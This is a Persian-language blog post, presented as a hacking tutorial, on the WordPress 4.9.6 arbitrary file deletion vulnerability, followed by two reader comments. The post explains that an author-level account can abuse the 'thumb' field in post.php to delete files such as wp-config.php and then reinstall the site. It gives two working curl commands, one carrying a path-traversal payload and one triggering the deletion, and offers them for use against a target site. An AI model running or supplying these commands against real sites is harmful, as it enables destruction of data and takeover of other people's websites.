اکسپلویت وردپرس 4.9.6 به منظور حذف فایل
اکسپلویت وردپرس | معرفی اسیب پذیری جدید وردپرس برای حذف فایل های حساس و ریست وردپرس و همچنین امکان دسترسی های دیگر
در ادامه این پست اموزشی با ما همراه باشید و نحوه استفاده از این اسیب پذیری را بیاموزید
اکسپلویت وردپرس 4.9.6
توضیحات درباره وردپرس و اکسپلویت وردپرس
وردپرس یک سیستم مدیرت محتوا بسیار محبوب و پر استفاده در دنیای اینترنت میباشد که این امکان را میدهد در کمتر از 5 دقیقه وبلاگ خود را راه اندازی کنید
به همین دلیل کاربران بسیاری را به سمت خود جذب کرده است و حجم زیادی از سایت های دنیا بر پایه این سیستم مدریت محتوا میباشند
در این پست اموزشی حفره امنیتی جدید وردپرس را معرفی میکنیم و توضیحات کاملی درباره ان خواهیم داد
اکسپلویت وردپرس
در نسخه جدید وردپرس ورژن 4.9.6 اسب پذیری مهمی کشف شد و داخل سایت های ثبت اکسپلویت ان را مشاهده میکنیم
این اسیب پذیری این امکان را به نفوذگر میدهد که فایل های درون دایرکتوری سرور را حذف نماید که این میتواند مشکلات بسیاری را رقم بزند
به طور مثال فایل config وردپرس یکی از مهم ترین فایل های ان میباشد که درصورتی که حذف شود
امکان ریست وردپرس به شخص داده میشود و میتوانید سیستم را از نو با پسود جدید راه اندازی کند
نحوه استفاده و اموزش هک
این باگ در برگه post.php وردپرس و ورودی thumb که برای ادرس فایل ها میباشد کشف شده است و
پس برای استفاده از اکسپلویت وردپرس به صورت دستی ان باید یک دسترسی سطح پایین داشت مانند نویسنده
در قسمت رسانه ها یک تصویر جدید اپلود میکنیم و در قسمت تغیرات وارد میشویم
در اینجا وارد لینوکس خود شوید و دقت کنید سرویس curl نصب باشد
بعد از ان همانند دستور زیر فایل مورد نظر خود را حذف کنید
curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
ادرس سایت مورد نظر خود را در قسمت site وارد کنید و در اخر هم صحفه مورد نظر مانند Config.php را میتوانید برای حذف انتخاب کنید
حال صفجه مورد نظر انتخاب شده است و برای حذف ان مانند دستور زیر انجام میدهیم
curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
بعد از اجرای دستور بالا اکسپلویت شما با موفقیت عمل میکنید
۲ دیدگاه در “اکسپلویت وردپرس 4.9.6 به منظور حذف فایل”
آیا روی نسخه های قدیمی تر از ۴.۹.۶ مثل ۴.۸.۷ هم کار می کنه یا فقط برای این نسخه است ؟ آیا امکان وجود داره سایتی بدون آپدیت هسته وردپرسی خودش به صورت دستی این آسیب پذیری رو رفع کنه؟ در ضمن لینک آخر آموزش کار نمی کنه.
درود
در نسخه های قدیمی تر هم این آسیب پذیری ممکن است وجود داشته باشد.
بله ممکن است که آسیب پذیر به صورت دستی رفع شده باشد ولی احتمال این کار بسیار پایین است و اغلب وردپرس را آپدیت می کنند.
مرسی از اطلاع رسانی شما لینک تصحیح شد.